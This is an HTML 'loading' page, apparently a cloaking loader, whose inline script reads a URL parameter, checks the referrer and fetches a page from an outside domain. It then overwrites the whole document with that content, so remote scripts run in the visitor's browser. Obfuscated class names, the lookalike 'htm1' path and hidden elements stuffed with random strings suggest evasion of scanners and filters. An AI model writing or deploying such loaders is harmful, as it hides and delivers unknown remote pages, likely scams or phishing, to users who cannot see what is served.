<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .LOVTLj {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .LOVTLj .oWbzkjR {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .LOVTLj .content {
            line-height: 50px;
            text-align: center
        }

        .LOVTLj .img {
            width: 100%
        }

        .LOVTLj .FmHsFiNwk9 {
            text-align: center
        }

        .LOVTLj .FmHsFiNwk9 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .LOVTLj .FmHsFiNwk9 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .LOVTLj .FmHsFiNwk9 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .LOVTLj .FmHsFiNwk9 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .LOVTLj .FmHsFiNwk9 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .LOVTLj .FmHsFiNwk9 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .LOVTLj .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function pL678kidC79QV(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var E1NNw = pL678kidC79QV('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ E1NNw +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ E1NNw +".html?a=share";
		}
		
        uDxft7u=url+"#"+new Date().getTime();
        uDxft7u && function() {
            $.get(uDxft7u, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >FCY1qsEwlFi3MmZnDl8izXDX4Z0c1NVfaPMNcNArI8JnMo7XIRSBDN27IhpNCG0H2KOai81JhyMlO1HOHcZWzrBZr</ul>
<p  style='display:none'>frImQykvkhiBk2sQspgR2lrzKDYJ9GuNEJKPupqH8m0vMtDfZYIbuJ8dMzNsnaGNnRR</p>
<ul style='display:none' >FCY1qsEwlFi3MmZnDl8izXDX4Z0c1NVfaPMNcNArI8JnMo7XIRSBDN27IhpNCG0H2KOai81JhyMlO1HOHcZWzrBZr</ul>
<h1 style='display:none' >GwYgdKtckFE1PQ6bKPMDhAyD7hTKOKyc9x9a2VPuNdITJqT5s5cykPgskTJo8akMFygOpRtAKkdLS</h1>
<li style='display:none' >ixFyjcG3V2pGkXz2Quh7RisK3vw6lcIShV6zp5EbgVtet3WRP7insNSFQxVXiyJDsdISU758q0</li><div class="LOVTLj">
    <div class="oWbzkjR">
        <div class="FmHsFiNwk9">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>vrbqSQ11KJryeo2r6FzBhfOsEa7BQE</p>
<li style='display:none' >CuueR71dsHWhX1APrN2U</li>
<li style='display:none' >CuueR71dsHWhX1APrN2U</li>
<a  href='#' style='display:none'>qAiKwSyKnHnMDAGEhEJ6alEN1xEqYNRELYuGHu8yWC6isM4ObK9GJ8BZGMW357Vx28UK</a>
<span style='display:none'>c7B9CgyRB3xWkVPoosGJlMQUUmERewob2z61KOmMJ2vftO9uE4FHwR9a3nM080z29V1ezPu3EWtxmX</span></body>
</html>